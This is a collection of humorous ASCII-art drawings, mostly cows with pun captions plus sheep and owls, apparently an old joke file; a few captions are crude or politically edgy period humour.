- (oo) ====________| * *
- /-------\/ /\
- / | || / \ *
- * ||----|| / \
- ~~ ~~ / \
- A Cowsmologist
- \ / _ /\ ` `_______ ` `
- /\/______\/ / \ `/_/_|_\_\ `
- | (__) /(`')\ ` |(__) `
- *---|______(^^) /-------\/ ` |(oo) `
- \/ / | || ` ` J \/ `
- * ||----||
- Cowt-of-order ~~ ~~ Cow in Bergen, Norway
- (Me-cow-nical failure) Cowloon (Rains 300+ days a year)
- (___) ________
- .____ (o o) / \ )
- / \ / --| UGGGGH! |
- / || O \________/
- / / ||
- / / ||
- /_____/__, ||
- *------'---------' ~~
- Sitting Bull Bull's Eye
- _________________________
- (___) / ...The President then \
- (o o) / had to take into serious \
- /-------\ / ----| consideration what implica- |
- / | ||O \ tions it would have for.../
- * ||,---|| \_________________________/
- ~~ ~~
- Bull-etin from the White House.
- ________________________________________________
- @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- %% %% %% %%
- || || || ||
- || || || ||
- || || _ (_) \o/ || ||
- || || /|_|(_) | || ||
- ____||______||_"_|_|_______/_\______||______||____
- The Roman Cowliseum...where ancient Christians were fed to
- vicious beasts...
- _
- | \ (___)
- | \ (__) (__) (~ )
- *----|---------------(oo) (oo) (o o)
- | ______ |\/ /-------$/ /-------$/
- |___/ /_____| / | ^^ || / | ||
- / / \____/ / / * ||-----| * ||------|
- / > > / ^^ ^ ^^ ^
- > > MacCow MosCow
- Stelth Cow
- *
- vv vv /
- ||____M__||/
- || || (__)
- /\||_______|| (xx)
- (Xx) \/
- (--)
- Cow by Georgia O'Keefe
- Dead Cow
- (__)
- (oo)
- \/
- /\
- __/---\ //\\
- <__/-(__) o/||\o
- (oo) (oo) //o||\\\
- /-------\/ /--\/ o///||o\\o
- / | || / -- ||
- * ||----|| || =====
- ^^ ^^
- A Christmas Cow-el
- The Butcher of Baghdad Karen Cowpenter
- (Saddam Holstein)
- (__ (__) (__) | | (__)
- (oo) (--) (--) | | (--)
- /-------\/ /-------\/ /o /-------\/ | I \/-------\
- / | || / | L |----< o / | D |----<T I>----| M | \
- * ||----|| * ||----| / o * ||----| I I |----|| *
- ^^ ^^ ^^ ^ | ^^ ^ | ^ ^^
- | |
- Cow owned by
- Vincent Van Gough Teenage Mutant Ninja Cows
- \\ //
- \\( )// (__)
- (o o) ( ) /(oo)\
- \ / (oo) / \/ \
- / \ ##########\/ / /\ \
- | | # ######## # / / \ \
- \___/ * # ###### # | | | |
- // | \\ # # # # | | | |
- // \\ |___| |___|
- " " Mosscow Cowderoys
- Cow11
- _____
- <_____>
- ( ) (==) |
- (oo) __ /------\/- *
- /---*-.---\/ (oo) / | | \/|
- / |* . * .|| /-------\/ * | |
- * ||------|| : :: |===|===|
- ~~ ~~ ::----:: ^^ ^^
- ^^ ^^
- Cow w/ cowpox Boris Cowlile Cow on Graduation day
- /
- /\ /
- \/ (__) / \ | /
- || <`'> / \ | /
- (_||_) \/ /^ _____ ___ _____
- __\||/__ #=======> | _ /(o o) \
- | /xx\ | ( )==/ (_)------/---\ / \
- __\xx/__| I____I | ||
- /ww\ ,---( _ ) . ||----||
- /| |\ / || \_=======|| oo oo
- |^ ^| ||
- ^ ^ || heli-COW-pter
- ==
- COW giving birth The Ninja Cow
- * (__)
- \ (oo) ________(__)_
- \---------------\/ |COW-SIO (oo) | (_--_)
- | 0.0 | | _______\/ | /*__*\
- |---------------| | |_________| | * __|(oo)|_
- | C CE ^ - | | | \/--( \|==|/ )
- | 7 8 9 + | | C = / * | | \ /
- | 4 5 6 * | | 7 8 9 - | \ \ | | | |
- | 1 2 3 / | | 4 5 6 + | | |-\ /-\ /
- | 0 . = | | 1 2 3 | ^ ^ ^ ^
- | || | 0 . = | NFL Dallas "COWBOY"
- ||-----------|| |_____________|
- ^^ ^^
- Cow-culater Cow-culator
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-------\/ /-------\/ /-------\//-------\/
- / | || / | || /| || /| ||
- * ||----||* ||----||* ||----||* ||----||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- COW-comitant
- (__) (__) (__) (__)
- ($$) (&&) (YY) (%%)
- /-------\/ /-------\/ /-------\/ /-------\/
- / | || / | || / | || / | ||
- * ||----|| * ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ .. .. $& #Y
- USA'$ cow GB'& cow JP'y cow Bank'% cow
- _____________
- | |
- | INDIANA 45 |
- | | |
- | PURDUE 52 | |
- |_____________| |
- ______|====\
- \/\/\/ \\
- \/\/ \\
- \\
- \\
- (__) __ \\
- (oo) /)(\ \\
- * / \/_/~\__/ ||
- \ / __/~ ||
- \/ / ||
- | _/ ||
- | | ||
- ~ ~ ------
- Hoosier
- Cow
- . .
- . . (__)
- (___) . (___) . (oo)
- (o o) . (- -) . /-------\/ 5+2=?
- \ / . \ / . / ! !!
- Q.. Q.. * !!----!!
- ^^ ^^
- smokin' cow waisted cow cow who cow'nts
- (__) (__)
- (00) ( )
- /----------------\/ \/---------------\
- / | | | | \
- * ||-----------|| |||----------||| *
- ^^^ ^^^^ ^^^ ^^^
- | |
- | |
- | |
- | |
- | |
- * |
- ^^^ ^^^
- ^ (___)
- _- --/ - `\ ^ |*-*|
- _________/_________ ^____ _ \o/`-\
- " /| \ / U |
- (__) ` /_| _ - \/\ | /
- |@@| | | //
- \/`--------.__/ | C/
- | / \---/
- //`---\/|| |/\ |
- || || || ||
- || ||
- || ||
- Helicowpter
- Cool Cow
- (__) (__) |
- (oo) ($$) |__ /---------o*o
- /---------------------\/ /-------\/---|| / | ||
- / | | | | | || / | | || * ||-----||
- * ||--||--||--||--||--|| * ||----| -- ^^ ^^
- ^^ ^^ ^^ ^^ ^^ ^^
- Cowterpillar Yuppie cow with Cow that was captured
- mobile phone. by head-shrinkers
- ((( ))))
- (( ( ))) ( ) I'm a cow, man !
- ( ( ) ) ) ^^^^^ /
- ( ( ( )))) | | _/
- ( ( / ) ) ) O O /
- ( ( \\ ) ) ) \ C / -
- ( : // ) ) ~
- : : / \
- : : O / | | \
- : : ( | | )
- : : \ \___/ /
- : : (__) W/ \W
- : : (oo) /|_n_|
- : : ----\/ / || ||
- : : :: | () ()
- : : ---:: * || ||
- ------------^^ VV VV
- Newton's Cow
- (aka Mooton) Bart Cow
- __
- >(__) This cow will make all those desisions for you by changing
- (oo) color according to the action you should take.
- /-------\/
- / | || If this cow appears to be:
- * ||----||
- ^^ ^^ GREEN: Yes, Go ahead
- MAKING COW. WHITE: No, unless it is raining.
- AMBER: Buy a better monitor/terminal
- GRAY: Adjust your contrast/brightness control
- BLACK (on black): Turn terminal/monitor on.
- BLACK (on white): Lucky git!
- ANY OTHER COLOR: Send terminal/monitor to repairer's,
- quickly!
- /~~\ +
- ) ( \__/ O O
- ( o)\ ========== o_o_o
- * \o / / {__} \ (___)
- \ \/-----\ / (**) \ (___)
- \----- || \ \ \/ / (___)
- $ | --|| * \"mon / ( 00
- ||-vv-- ~~ \ parfum"/ \_ |
- ~~ ======== \_o
- Pablo Picowsso Paloma Picowasso King Cowles II
- ______ ___________
- : Oui? : : :
- _______ `v-----' : CORNED :
- : Nee! : (__) : BEEF :
- `------v' (oo) :_________:
- /-------\/
- / : :: An exercise found in a text book of quantum
- * ::----:: mechanics: "solve the Schrodinger equation
- ^^ ^^ of a cow in a box. Please, pay attention on
- the boundary conditions!"
- Belgian Cow
- (__)
- (oo)
- /-------\/
- / : :: (/\)
- * ::----:: /oo\ (__)
- XX======^^====^^==>> /-----/____\ (--)
- X US MISSILE >> / | || /--------\/
- X Greetings >>> * ||----|| / \ | \__
- X George >> ~~ ~~ * /__-------__|
- XX================>> ~ ~
- Cow klux klan Cow resting
- Irakean Cow
- ___()
- COW ------------| o\
- | )O-------------- MOO
- -----|____/ /
- \ /
- \ / (____)
- \ / \( )
- \ / |\( )
- \ / \ \( )
- \ / \ \( )
- X |\ \( )
- / \ | \ \( )
- / \ \ \(____)
- / \ \|_o_o_|
- / \ | |
- / \ | |
- / ___() \
- -----| o\ \ cow chip
- | |O-------------- ~MOO
- BULL ---------- |____/
- Cow Flop (new flip-flop, patent pending)
- ( ) ( )
- \ / \ /
- \___/ \___/
- (o o) (o o)
- /-------------\o/ /-------------\o/
- / | || / | ||
- * ||-,--------|| * ||@\\-------||
- || || || \\ ||
- ~~ ~~ ~~ ~~
- Texas Longhorn Steer Texas Longhorn Bull
- __
- (__) ( ) (__)
- (oo) / (oo)
- _______\/ / \ _______\/
- / / \ /| |
- / | || / \ / || ||
- * ||-__-|| (_____________) * ||----||
- ^^ ^^ ^^ ^^
- Pregnant Cow Hanger De-calf-inated
- (__) (__) iiiiIiiii
- (oo) (oo) '|o o|`
- /---------\/ ---------\/ ________\_/
- /| | || / | || / | |
- * |__|-----|| //____\-----|| # ||ww____||
- || || * || || || ||
- ~~ ~~
- cow-boy cow-girl Happy Hannucow!
- (or a Sco(w)ttish cow-boy)
- \_ ^
- \ | **~~~~~~~
- _____) \___ | **~~~~~~~
- __/ \__ (__) | ~~~~~~~~~
- _/ \ (oo) | ~~~~~~~~~
- / ____ ( ) \/ |
- / / __/ \__ |o o| /( \/|
- /| ||_/ \ \ / ( ) |
- ^^^^^^^^^"^// /^^^^^^^^^^^^^\ \\^^^^^^^^^^ /~\ |
- // / | ||
- [][] [][] Patriotic Cow
- Sha-MOO
- /\
- / \
- / \
- | |
- / * * \
- / ** * \
- / * ** \ **
- / * * \ ** **
- . . . | | * * <--- the world
- . . / **** \ * *
- . . . / * * \ ** **
- . . . / **** \ **
- . / * * \
- . | |
- . / **** \
- . / * \ . .
- . / **** \ . .
- / * \ . .
- / **** \
- | | . . .
- | **** |
- | * * | . . .
- | **** | . . .
- | * * | . . .
- |------------------------------| . .
- | (__) (__) (__) (__) (__) | . .
- . /| (oo) (oo) (oo) (oo) (oo) |\
- / | /\/\ /\/\ /\/\ /\/\ /\/\ | \ . . .
- . / |=|==|==|==|==|==|==|==|==|==|=| \ .
- . / | | | | | | | | | | | | \ .
- / USA | ~||~ ~||~ ~||~ ~||~ ~||~ |NASA \ .
- |______| ~~ ~~ ~~ ~~ ~~ |______| .
- . (______________||______________) . .
- . /_\ /_\ . . .
- !!! !!!
- The herd shot 'round the world.
- (_ _)
- ___ (o o)
- (__) _- -_( )
- (++) /- O O
- /____O/ / | ||
- /| || * ||-___-||
- * ||--|| ~~ ~~
- ~~ ~~
- This cow belongs to This cow belongs to
- Mr. Bill Rosanne Barr
- _________(__)___
- | -------------- |\
- (__) (__) "slurp" /|| || \
- (oo) (oo) / ||milkfat 1% || \
- /-------\/ \/-------\ * * ||______________|| /
- / | || \__/ || | \ * |________________|/
- * ||----|| | | ||-----|| * * || ||
- ~~ ~~ |__| ~~ ~~ * ~~ ~~
- *
- cowoperation ----------------------
- / - - - - - - - - --- /
- / - - - - - - - - --- /
- ----------------------
- (oooo) personal cowmputer
- oo( -0 )oo
- / ------------ \/
- / | | /|
- / | ----\_/ | / |
- > < ||| ||| / |
- ||| ||| |/ |
- ~~ ~~ \ |
- Wendy Wellesley Cow- /| // (__)
- note the shapely figure and painted / /\// (oo)
- hooves---and the sexy wink reserved | | / /-------\/
- for MIT men. | / / | ||
- | / * ||----||
- | / ^^ ^^
- _____ * |/ breacowt!
- (_____) /
- ( OO )_____________ /
- (/~~\) ######### \/ |\------------\
- \O_/ * * * * |= = = = = =|- SCUD )
- | ######### | |/------------/
- | |__________| |
- || | || |
- || | || |
- ~~~~ ~~~~
- Saddam moo-sein
- @
- (__) (__) _____/
- /| (oo) _ (oo)/----/_____ *
- _o\______/_|\_\/_/_|__\/|____|//////== *- * * -
- /_________ \ 00 | 00 | /== -* * -
- [_____/^^\_____\_____|_____/^^\_____] *- * -
- \__/ \__/
- Cow-mobile
- (()) (()) ||||
- (oo) (oo)
- /------\/ (OO) /------\/
- /| | /------\/ /| |
- * ||----|| /| | * ||----||
- ^^ ^^ * ||----|| ^^ ^^
- ^^ ^^
- Don King cow Don King cow after Buckwheat cow
- getting electric shock (Otay? Otay!)
- /\
- / \ (__) __
- (oo) (oo) (oo)
- /------\/ /-ooo--\/ /------\/
- /| | /|o | o | /| |
- * ||----|| * ||o^o || * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
- "Conehead" cow Anti-war cow Sinead O'Connor Cow
- o o - -
- O Moo!!!!
- ghost-cow sleeping ghost-cow
- Cow-nty Police Officer Cow-nty Police Car
- ___
- [___] ____|___|____
- (o o) / [__] \
- /------------\-/ / (oo) \
- / | ||^ |V / |\/| \
- | | <**> | |-----------------|
- * -----/\------ | Cow-Price |
- || O O || |_________________|
- || || \_________________/
- || || | | | |
- oo oo |__| |__|
- (With gun and Handcuffs)
- (it's a Cow-Price)
- (Classic of course)
- \ /
- \ /
- (__) \ (__) /
- /\/\_(oo) \ /\/\_(oo) /
- // == \ // == /
- / | /\/\|| \ / | /\/\|| /
- * || || \ * || || /
- ^^ ^^ \___^^____^^_____/
- Silly cow
- (his father was a camel) Sillycow-valley.
- ___ __ __ _
- (( /\ (__) ( /\/ \(__) (__) //
- \\ /\ (oo) \ /\\/(oo) _(oo) //
- ,----\ /\--\/ ,----\ /\--\/ /----/ \\/ //
- ( ) ) ) // || ( ) ) ) // || / ||-- ( ) ====
- `-----//--|| `-----//--|| * || \_( ) //
- ^^ ^^ ^^ ^^ ^^ ^ ^
- beecows Cownan the barbarian
- (__) (__)
- (oo) (oo)
- /-------\/ /-----------------\/
- / | || / | /qwertyuiop \||
- * ||----|| * || asdfghjl; ||
- ^^ ^^ || zxcvbnm,./ ||
- sliced cow ^^ ^^
- keyboard-cower
- ( )
- (oo)
- /--------\/
- / || ||
- * ||------||
- || ||
- ( ) || ||
- (oo) || || | | | |
- /--------\/ || || || || || ||
- / || || || || || || || ||
- * ||------|| || || || || * ||------||
- || || || || || || \ || ||
- || || || || || || \--------/\
- || || || || || || (oo)
- ^^ ^^ ^^ ^^ ^^ ^^ ( )
- high cow very high cow broken very high cow
- __ (__)
- (__) (__) (oo)
- (\/) (oo) < vv >
- /-------\/ /-------\/____) / \
- / | || / |______ | | /| |\
- * || || || || __ / |( )| \
- ____||_____||_____/ _______ / ||""||\ \
- cow san /___||__||_*_\
- Ge-cow-logist ~~ ~~
- Cownt Dracula
- (__) ( )
- * ` (OO)' (00) //
- \_/-------\/ ` ___ \/___//
- || ||_. ` /---\_/---\
- %_/ ~-----\ ------------------
- ~ l l
- l___________l
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ l ll ll l
- // // // / / | \\ \ \ \\\ l v v l
- - -
- Cow on a hot tin roof A 'cow'ntant
- \ ,_________________./ /
- (__) -/.__________________ -
- oo ) \ (__) / \
- _!_/_ \ (oo) /
- !--!-\___/ !\ \.\/./
- !__! ! ! \ | |
- \___/ * | |
- / W \ / | |
- ! ! o / / / \'
- ! ! /|\/' | \
- ______/_\_________________|______\ _____
- Cow from ^ ^
- Velke Popovice Brewery David and Cowliath
- .
- . .
- . . . __ __
- . ||______________________||
- . . || __________________ ||
- / || | (__) | ||
- . . / || | (oo) | ||
- | -|| | _\/_ | ||
- . . \ || |=---------/(())\-\| ||
- (\ |\-----------------------\
- . (\ || \_______________________\
- \|| | |
- . \| | (O) |-----------| (O) | .
- \ | |-----------| | .
- . \ | PETERBILT | .
- \| |
- . (=========================)
- |_||_| |_||_|
- . \
- . \
- Pompano Beach or bust!
- ^^^
- ^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^^^^^
- ++++++++++ ************************ ^^^^^^^^^^^^^^^^^^^^^
- *********************************** \ /
- *********************************** \ /
- *********************************** \ /
- *********************************** \ /
- \ ^(__) /
- \ / (@@) /
- 82nd Cowborne Cowtrooper \|__\/__
- | | |
- | | |
- |__|-^-
- / \ \__*
- | |
- ^ ^
- -----------------------------------------------
- | U. S. Federal Prison |
- |---------------------------------------------|
- | | | | | | | | | | | | | | |
- | | | | | |^ | (__) | ^| | | | | | |
- | | | | | | \| (00) |/ | | | | | | |
- | | | | | | \__\/__/ | | | | | | |
- | | | | | | | | | | | | | | | | |
- | | | | | | | | |-| | | | | | | |
- | | | | | | | / \ \_ | | | | | | |
- | | | | | | |/ \| \* | | | | | |
- | | | | | | ^ ^ | | | | | | |
- -----------------------------------------------
- Former Panamanian General "I'm not a Mule" Manny Cowiega
- ---------------------------------------------------------
- ---.---.---.-------.---|.-- ---------|---|----
- --.-.---.---- (__) -----.---.---|-
- -|---|- __) (++)___ -----.---|---
- ----| ^\ ^\ (xx) ___\//---^ -----.---|--
- ----- | \____\_\/ / \ \_____ ---.---
- ========= - \_____/\ ^ . \_/____ ^ -====
- . - - / \ ' ^ . - .
- \ / . ^ - \
- ` ^ ` ` `
- Former despot Romanians Nicolae and Madame Cow-cescu
- (__)
- (OO) __
- \/ |__|
- // \ |
- // \ \ |
- ^^ \// \ |
- /-------------\
- -----------------------/ Panama \
- ----------------------/ or \
- / Bust! \
- _____________/---------------------\_____________
- / \
- / \
- \ /
- \_________________________________________________/
- M1 Abrams Cow Commander
- (__) *
- (OO) |
- \/ |
- // \ -----
- // \ \ / \
- ^^ \// \ / \
- // \ | |
- --^^------ * / \
- \ ____ / / / \
- |||||| | \ |
- |||||| / \ \
- |||||| | / |
- |||||| /___________\_______\
- |||||| /
- |||||| (_/)
- __||||||||__ (@@)
- | .,....,. | \/
- | ...,.,.. |
- ------------ Cow Bell (or the Liberty Cow Bell)
- The Acowdemy Award
- ____________________________________________________________________
- | ________________________________________________________ |
- | 10 ) T H E U N I T E D S T A T E S O F A M E R I C A ( 10 |
- | / ........... ____ \ |
- | | / \ A10806726C | |
- | | 1 (A) | (__) | ___ __ __ 1 | |
- | | | (oo) | | |_ |\ | | |
- | | A10806726C | _\/_ | | |__ | \| | |
- | | 1 .......... \//;;/\/ ........... 1 | |
- | \ ......... _______________ ........ / |
- | 10 )___________________/ TEN DOLLARS \____________________( 10 |
- |______________________________________Abortion Rally calls__________|
- Cownterfeit
- >>>----> *___ ______
- \ __|_**_|__
- >>>----> \ | . . |
- \ _______________\ /
- * ( | | US CALV| \o/
- >>>----> / /\ |_________| \-- |
- ( / / \ \__________\_\ ---| |
- >>>----> . ( ) / / \ \ \ \ |*|
- . / / \ \ \ \
- . /* \ \*\ \*\
- The CALVelry COWard
- ____
- | | . .
- vv vv __|__|__ \ /
- ||----|| * \00/ \__/
- || | / /-----------C\/C (oo)
- /\-------/ / | CCCC /-------\/
- (oo) / ||_________CCCC / | ||
- (~~) * || || * ||----||
- nn nn ^^ ^^
- Australian view of a
- North American Cow Abraham Lincow This cow belongs
- to "My Favorite Martian"
- (__) (__)
- (oo) (oo)
- (__) >------\/------< >------\/------<
- (oo) | | | | | | | |
- >------\/------< | | | | | | | |
- | | | | | | || | | | | || | |
- | `____' | | `----' | | `-OO-' |
- `--|--|--' `--|--|--' `--|--|--'
- | | | | | |
- ^ ^ ^ ^ ^ ^
- "FLASHER" calf "FLASHER" steer "FLASHER" bull
- (Big Mac)
- (_____) _____________
- \0 0/ / \
- _________(o o) XXXXXXXXXXXXX
- / | U | \_____________/
- * | /______ _ |
- || || || ||
- this is a cow... this is a cow on drugs
- Any questions??
- .
- \---) (__) *
- |o o) ==== /
- (---\o/--\ /-------\/ (___)--------|/
- | |#| ) | / | || (o o) ||
- | |#| ) | * ||-||-|| YY ( )-||--I--||
- ^ |#| ) ~ ^^ ^^ ^^ ||--I--||-( ) ^^
- //--\ || ^^(o o)--<
- // | \ This cow is from Mars. /|--------(---)--<
- || * | /
- ^^ ~ * "69"
- Cowborg
- * * *
- *
- * * (__) *
- * _--_ ( oo) *
- _- )\ '|
- * /| ) _ \ \ ~~ * *
- / \ \-- \ \
- *-' // / > >
- > >
- / / *
- / / *
- _ _ -- _ _
- / \ *
- * / _ _ _ \
- | / \| *
- | |
- * | | * *
- | |
- | | *
- | \_ _ _ /|
- \ /
- * \ _ _ _ / *
- ---
- (__)
- (__) \__\/__/
- {}\ (oo) l l
- /----\----\/ l__l
- / | \ |\ / l__\
- * || >-+-\ <\ / /
- || | ())))) \ \ ))))))
- ^^ ^ / )))) \ \))))))
- / \ / (
- bum steer ~~~~ \ / ~~~~~~~~~~~~~~~~
- Cowabunga!!
- (__)
- (~~) V __ (__) (__)
- /--------\/ | / \ (oo) (oo)
- * | | ----: /-- --\/ /-------\/ {BIG MAC}
- >--: |----| / | || / | |---/
- | | * ||-----|| * ||----|
- ^ ^ ^^ ^^ ^^ ^
- beef jerky cowsimodo cownibal
- _______\
- -<| CUD \
- /-<|_______/
- (__)// / ((|))
- (oo)/ ($ $)
- \// /-------\_/ *
- / | / | ||__<i
- __ | | * ||----|
- * \| _| ^^ ^
- / |
- / | New Kow on the Block
- ^ ^ (note lighter in hoof)
- CUD missile launcher
- ((----))
- ((oooo))
- ///-----\\\///
- ///||| |||
- *** ||||||---|||
- ^^^^^^ ^^^
- where milkshakes come from
- -------------------------------------------------------------------------
- | ___________ | | |
- | (__) ( You know, ) | (__) ________ | (__) ______ |
- | (oo) ( Kentucky ) | (oo)( How do )| (oo) ( )|
- | /-------\/ ( cows are ) |---\/ ( they )| \,,/ ( MOOF )|
- | / | || (bucktoothed) | || \( talk? )|/-------\/ \ ( )|
- | * ||----|| \ /---------- |--|| \/------- | | || \/------ |
- | ^^ ^^ \/ | ^^ | ||----|| |
- | | | ^^ ^^ |
- ------------------------------------------------------------------ J.B.--
- Cowmic Strip
- | \___________________________
- | ___________________________
- | / /
- | | /
- | | /
- | | (__) /
- | | (oo) /
- | | _\/_ /
- | | / ==%
- | | / ==%
- | | *---<_ / /
- | | / /
- | | / /
- | | ~ ~
- | |
- | | Moowgli
- | |
- / \
- (__) . . . . (---)
- \oo/ . . .. . (-------(----)----( ) *
- /;;\ . . . (__) ( ( ) )(x x)_____/
- \__| |__/ . . . (oo) \ OO---------OO-/ O \_/\/\/
- |%%%%| //-------\/ OOOOOO OOOOOO / \
- ~ ~ // | U M || OOOOOO OOOOOO . .
- ~ ~ ** ||----||
- grandcow is ^^ ^^ Argyle cow about to be hit by
- sitting Go Blue Cow an armored personnel carrier
- (__
- (o ======]
- ------- )
- | || __0 \\\||||///
- | || () _____ = 00000000 = <----- radioactive waste
- Cow after biology major Cow after Physics Major
- is finished with it is finished with it
- | |
- | |
- (__)| |
- (__) (__) (@@)| |
- (oo) (oo) |\/-===< |
- /-------\/ *____-------\/ | | |
- / | || // // | | |
- * ||----|| >='/-----// /\|___===< |
- __^^____^^__/ ___^_____^^__/ __oo____*o__. | |
- oo oo oo oo `////\\\\
- Cow on skate-board Cow at running Cow without skate-board
- (watch out!)
- /\__ Sheeping sleep
- @@@@@@@@@@@ - \,I mean
- @@@@@@@@@@@@@@___/ Sleeping sheep
- @@@@@@@@@@@@@@@
- @___@@@@@@@@@@@__@ /\_____
- / O \
- / \
- @@@@@@@@@@ /
- Concieted @@@@@@@@@@@@@@_______/
- sheep. @@@@@@@@@@@@@@@
- @ @@@@@@@@@@@
- ___ || ||
- / | ~~ ~~
- / - \
- \ @@
- @@@@@@@@@
- @@@@@@@@@@______#
- @@@@@@@@@@_______# /\___
- @@@@@@@@@@@@ @@@@@@@@@@ @ \ Had to put this one in,
- @@@@@@@@@@@@ @@@@@@@@@@@@@@___/ really,didn't I?
- @@@@@@@@@@=@@@@@@@@@@@@@@@ __
- @@@@@@@\ \ @@@@@@@@@@@ ||
- @ / / || || ||
- ~~~ ~~ ~~ ||
- || __
- |\\ ||
- ||\\ ||
- || \\ ||
- /\__ || \\||
- @@@@@@@@@@ O \ ||___\||________________________
- @@@@@@@@@@@@@___/ ||\ || . ....\
- @@@@@@@@@@@@@ || \ || . . . . \
- @@@@@@@@@ || \ || . . \
- ( >> >> || \|| . . . \
- ~~ ~~ \ || _______________ \
- ( \ ||______ | HIGH JUMP |_______\
- \ ||| \_____________/ |
- ( @@@@@@@@@@@@@@@ \||| || |
- |||____________||______________|
- ||
- ||
- ~~
- ___
- / |
- / - \
- \ @@
- @@@@@@@@@
- @@@@@@@@@@______# (_____)
- @@@@@@@@@@_______# ( @ @ )
- @@@@@@@@@@@@ ---------\ /
- @@@@@@@@@@@@| \O/ Sheep performing an act of buggery
- @@@@@@@@@@=| | on a cow.
- @@@@@@@\ \|---------||
- @ / /|| ||
- ~~~~~ ~~
- The starsheep enterprise....
- (\___/)
- ( O O )
- /@@\ \ /
- @@@@@@@@@@@@@@@@@@@@@@\ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\_/
- @@@@@@@@@@@@@@@@@@@@@/ @@@@@@@@@@@@@@@@@@@@@@@@@@ _________
- @@@ @@@@@@@@ _____/
- @@@ @@@@@@ __/ . .
- @@@@@@@@@@@@@@@@@@@@@@@@@ _/ .
- @@@@@SHP-1701@@@@@@@@@@@-( _/ . .
- @@@@@@@@@@@@@@@@@@@ / . . .
- _/.
- /. .
- /. . .
- / .
- /. . .
- / . .
- (\ /)
- ( \_/ ) (\_/)
- @@@@@@@@@@|~ ~| @@@@@@@@@@|===|
- @@@@@@@@@@@@\O O/ @@@@@@@@@@@@\___/
- @@@@@@@@@@@@@@\_/ @@@@@@@@@@@@@@\o/
- @ @@@@@@@@@@@ @ @@@@@@@@@@
- || || || ||
- ~~ ~~ ~~ ~~
- ~~ ~~
- || ||
- @@@@@@@@@@@@@@@@@ DEAD SHEEP.
- @@@@@@@@@@@@@@@@@@@
- @@@@@@@@@@@@@@@@@@@\___
- @@@@@@@@@@@@@@@@@@ \
- @@@@@@@@@@@@@@@@@ -___/
- \/
- ___________________
- ______________ | || |
- | ZORBA'S | | || |
- |Greek | | #####________#### |
- | Takeaway.. | | ####| . ..|### |_ (((())))
-############################# | #####| . ..|#### |\\ ( )
- | #####| . ..|#### | \\ ( O O )
- | | ..| | \\ ___\ __ /__
- | ######| ..|##### | \\ / \__/
- | ######| ..|##### | \\ /
- | ######\____/##### | \\ / /|
- | ####### || ###### | \\ / / | ZORBA'S
- | ' || ' | @@/ / |
- | || ' | <@@/ |
- |\_________________/| @@ |__________
- ######################################|**********
- |||||||||||||||||||||||||||||||||||| |*****|****
- |||||||||||||||||||||||||||||||||||| |*****|****
-____________________________/ ____ ____ ____ ____
- || || || || || | | | | |~~~~| | |
- /__\ /__\ (__) (__) (__) | | |~~| | | |~~|
- \~~/ \ / \ / \ /
- || || || ||
- (\___/) ______________________________
- (O O)
- @@\ /@@
- @@@@@\_/@@@@@
- /@@@@@@@@@@@@@\ @@ ## @@
- @@@@ ___/ / /@@@@@@@@@@@\ \ @@ ## _||_ @@@@
- C| | \ // / / @@@@@@@@@@@ \ \ || || / LA \ | |)
- \__/ || @@@/ @@@@@@@@@@@ \@@@ || || | | |__|
-|||||||||||||||||||||||||||| U N I O N B A A ||||||||||||||||||||||||||||||||
- /\____
- / O \
- @@@@@@@@___/
- @@@@@@@@@@ / (
- @@@@@@@@@@======@--/---)_/)
- @@@@@@@@@@@ O | |
- @@@@@@@@@@@ @@@@@@@@
- @@@@@@@@@@@ #############
- BAA - BER. @@@@@@@@@ ###############
- || || ###############
- ~~ ~~ ###############
- ########## #############
- # # |\ /|
- # # ||\ /||
- # # ~~ | | ~~
- ________________#________#_____________|_|______________________
- |\/\/\/\/|
- | |
- | O O |@@@@@@@@@@@@@@@@@@@@@
- \ /@@@@@@@@@@@@@@@@@@@@@@@@
- \ __ /@@@@@@@@@@@@@@@@@@@@@@@@@@
- \__/@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- @@@@@@@@@@@@@@@@@@@@@@@@@@@ @
- @@@@@@@@@@@@@@@@@@@@@@ @
- | | | |
- | | | |
- ~~~~ ~~~~
- (\___/)
- @@@@@@@@@@@| O O|
- @@@@@@@@@@@@@@\ /
- @@@@@@@@@@@@@@@@\\__/ Hic!
- @@@@@@@@@@@@@@@@@\_U <--- Pissed BAA - stard.
- @@@@@@@@@@@@@@@ Hic!
- || || |@@@|
- ~~ ~~ C| |
-#################### \___/ _____
-################################ _/ / \_
- _/ / \_
- / / \
- \_____________/
- |O O|
- \ /
- @@\ - /@@
- /@@@@\_/@@@@\\
- /@@@@@@@@@@@@@ \
- / /@@@@@@@@@@@@ _\
- / /@@@@@@@@@@@@@@ \\
- |______ @@@@@@@@@ \\
- @@@@@@@@@@@@@@@ @@
- @@@@@@@@@@@@@
- @@@@@@@@@@@@@
- @@@@@@@@@@@
- || @ ||
- ~~ ~~
- (\___/)
- @@@@@@@@@@@@@@|O O|
- @@@@@@@@@@@@@@@\ /
- @@@@@@@@@@@@@@@\ /
- @@ @@ \_/
- @@ @@
- @@ @@
- @@ @@
- @@ @@ Baa Stool
- @@ @@
- @@ @@
- @@______@@
- @@______@@
- @@ @@
- @@ @@
- @@ @@
- __________________________
- / (\__/) === \
- ___ / |O O| \ ___
- |___|/___@@\__/@@___________________\|___| .
- /________________________________\ .
- || \=======*=======/ || . .
- ################################## ...
- .... . . .. \____________|BAA 1|_____________/ . ....
- . . . .. #### ------- #### ... . . .
- . ..... #### #### .. ... .. .
- ___ v v v ___ ___
- <*,*> <*,*> <*,*> <`,'> <*,*>
- [`-'] [`-'] [`-'] [`-'] =^`-'^=
- -"-"- -"-"- -"-"- -"-"- " "
- owl punk owl owl with antlers chinese owl flying owl
- ___ ___ ___ ___ ___
- <+,+> <@,@> <*,*> <-,-> <$,$>
- [`-'] [`-'] [`-'] [`-'] [`-']
- -"-"- -"-"- -"--- -"-"- -"-"-
- drunk owl owl junkie one legged owl shrewd owl greedy owl
- _
- ___ ___ _|||_ /_\
- <#,#> <o-o> <*,*> <*,*>
